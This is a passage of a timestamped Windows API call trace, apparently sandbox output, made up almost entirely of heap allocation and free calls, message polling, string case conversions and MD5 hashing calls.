Flags=0x0, Size=0x8) returned 0x24b1788 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.990] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.990] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.990] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.990] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.990] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.991] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.991] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0206.991] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.992] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.993] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.993] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.994] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0206.994] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.994] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.994] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.994] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.994] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.995] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0206.995] CryptHashData (hHash=0xaa5860, pbData=0x24b1c38, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0206.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0206.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.998] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0206.999] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.999] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.000] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0207.000] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.000] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0207.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0207.001] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0207.001] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0207.001] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ca8 [0207.001] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.001] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.002] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0207.002] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.002] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0207.002] HeapFree (in: 